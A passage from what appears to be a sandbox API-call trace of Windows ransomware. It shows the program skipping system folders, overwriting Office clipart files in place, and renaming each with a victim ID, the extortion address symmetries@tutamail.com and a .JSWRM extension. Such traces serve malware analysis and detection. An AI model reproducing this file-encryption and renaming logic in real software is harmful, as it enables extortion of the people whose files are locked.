hHeap=0x1e0000) returned 1 [0096.705] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10360091, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10360091, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10360091, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3636, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00704_.WMF", cAlternateFileName="")) returned 1 [0096.705] lstrcmpiW (lpString1="SO00704_.WMF", lpString2=".") returned 1 [0096.705] lstrcmpiW (lpString1="SO00704_.WMF", lpString2="..") returned 1 [0096.705] lstrcmpiW (lpString1="SO00704_.WMF", lpString2="...") returned 1 [0096.706] lstrcmpiW (lpString1="SO00704_.WMF", lpString2="windows") returned -1 [0096.706] lstrcmpiW (lpString1="SO00704_.WMF", lpString2="recovery") returned 1 [0096.706] lstrcmpiW (lpString1="SO00704_.WMF", lpString2="perflogs") returned 1 [0096.706] lstrcmpiW (lpString1="SO00704_.WMF", lpString2="documents and settings") returned 1 [0096.706] lstrcmpiW (lpString1="SO00704_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0096.706] lstrcmpiW (lpString1="SO00704_.WMF", lpString2="system volume information") returned -1 [0096.706] lstrcmpiW (lpString1="SO00704_.WMF", lpString2="msocache") returned 1 [0096.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0096.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00704_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00704_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00704_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0096.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0096.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00704_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00704_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00704_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0096.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0096.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0096.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0096.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0096.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0096.706] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00704_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00704_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0096.707] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=13878) returned 1 [0096.707] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.707] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3630) returned 0x24d210 [0096.707] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3630, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3630, lpOverlapped=0x0) returned 1 [0096.709] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.709] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3630, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3630, lpOverlapped=0x0) returned 1 [0096.709] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0096.709] CloseHandle (hObject=0x314) returned 1 [0096.709] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0096.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0096.709] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0096.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0096.709] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0096.709] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0096.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0096.709] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0096.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0096.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0096.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0096.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0096.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0096.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0096.710] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00704_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00704_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00704_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00704_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0096.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0096.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0096.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0096.711] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10386305, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10386305, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10386305, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x16478, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00726_.WMF", cAlternateFileName="")) returned 1 [0096.711] lstrcmpiW (lpString1="SO00726_.WMF", lpString2=".") returned 1 [0096.711] lstrcmpiW (lpString1="SO00726_.WMF", lpString2="..") returned 1 [0096.711] lstrcmpiW (lpString1="SO00726_.WMF", lpString2="...") returned 1 [0096.711] lstrcmpiW (lpString1="SO00726_.WMF", lpString2="windows") returned -1 [0096.711] lstrcmpiW (lpString1="SO00726_.WMF", lpString2="recovery") returned 1 [0096.711] lstrcmpiW (lpString1="SO00726_.WMF", lpString2="perflogs") returned 1 [0096.711] lstrcmpiW (lpString1="SO00726_.WMF", lpString2="documents and settings") returned 1 [0096.711] lstrcmpiW (lpString1="SO00726_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0096.711] lstrcmpiW (lpString1="SO00726_.WMF", lpString2="system volume information") returned -1 [0096.711] lstrcmpiW (lpString1="SO00726_.WMF", lpString2="msocache") returned 1 [0096.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0096.711] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00726_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.711] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00726_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00726_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0096.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0096.711] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00726_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.711] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00726_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00726_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0096.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0096.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0096.711] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0096.711] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0096.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0096.711] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00726_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00726_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0096.771] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=91256) returned 1 [0096.771] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x16470) returned 0x24d210 [0096.772] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x16470, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x16470, lpOverlapped=0x0) returned 1 [0096.779] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.779] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x16470, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x16470, lpOverlapped=0x0) returned 1 [0096.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0096.781] CloseHandle (hObject=0x314) returned 1 [0096.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0096.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0096.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0096.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0096.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0096.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0096.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0096.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0096.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0096.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0096.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0096.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0096.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0096.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0096.781] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00726_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00726_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00726_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00726_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0096.783] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0096.783] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0096.783] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0096.783] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10386305, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10386305, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10386305, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1758, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00728_.WMF", cAlternateFileName="")) returned 1 [0096.783] lstrcmpiW (lpString1="SO00728_.WMF", lpString2=".") returned 1 [0096.783] lstrcmpiW (lpString1="SO00728_.WMF", lpString2="..") returned 1 [0096.783] lstrcmpiW (lpString1="SO00728_.WMF", lpString2="...") returned 1 [0096.783] lstrcmpiW (lpString1="SO00728_.WMF", lpString2="windows") returned -1 [0096.783] lstrcmpiW (lpString1="SO00728_.WMF", lpString2="recovery") returned 1 [0096.783] lstrcmpiW (lpString1="SO00728_.WMF", lpString2="perflogs") returned 1 [0096.783] lstrcmpiW (lpString1="SO00728_.WMF", lpString2="documents and settings") returned 1 [0096.783] lstrcmpiW (lpString1="SO00728_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0096.783] lstrcmpiW (lpString1="SO00728_.WMF", lpString2="system volume information") returned -1 [0096.783] lstrcmpiW (lpString1="SO00728_.WMF", lpString2="msocache") returned 1 [0096.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0096.783] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00728_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.783] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00728_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00728_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.783] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0096.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0096.783] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00728_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.783] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00728_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00728_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.783] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0096.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0096.783] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0096.783] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0096.783] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0096.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0096.783] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00728_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00728_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0096.784] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5976) returned 1 [0096.784] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1750) returned 0x205850 [0096.784] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1750, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1750, lpOverlapped=0x0) returned 1 [0096.786] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.786] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1750, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1750, lpOverlapped=0x0) returned 1 [0096.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0096.787] CloseHandle (hObject=0x314) returned 1 [0096.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0096.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0096.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0096.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0096.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0096.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0096.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0096.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0096.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0096.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0096.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0096.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0096.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0096.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0096.787] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00728_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00728_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00728_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00728_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0096.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0096.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0096.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0096.788] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10386305, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10386305, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10386305, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x13fc, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00732_.WMF", cAlternateFileName="")) returned 1 [0096.788] lstrcmpiW (lpString1="SO00732_.WMF", lpString2=".") returned 1 [0096.788] lstrcmpiW (lpString1="SO00732_.WMF", lpString2="..") returned 1 [0096.788] lstrcmpiW (lpString1="SO00732_.WMF", lpString2="...") returned 1 [0096.788] lstrcmpiW (lpString1="SO00732_.WMF", lpString2="windows") returned -1 [0096.788] lstrcmpiW (lpString1="SO00732_.WMF", lpString2="recovery") returned 1 [0096.788] lstrcmpiW (lpString1="SO00732_.WMF", lpString2="perflogs") returned 1 [0096.788] lstrcmpiW (lpString1="SO00732_.WMF", lpString2="documents and settings") returned 1 [0096.788] lstrcmpiW (lpString1="SO00732_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0096.788] lstrcmpiW (lpString1="SO00732_.WMF", lpString2="system volume information") returned -1 [0096.788] lstrcmpiW (lpString1="SO00732_.WMF", lpString2="msocache") returned 1 [0096.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0096.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00732_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00732_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00732_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0096.789] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, 